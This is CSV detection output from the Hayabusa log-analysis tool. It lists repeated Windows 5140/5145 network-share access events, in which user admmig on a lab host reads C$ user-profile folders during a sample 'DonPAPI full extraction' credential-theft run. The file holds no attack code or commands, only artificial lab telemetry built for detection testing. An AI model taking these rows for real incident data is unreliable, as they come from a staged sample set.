2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
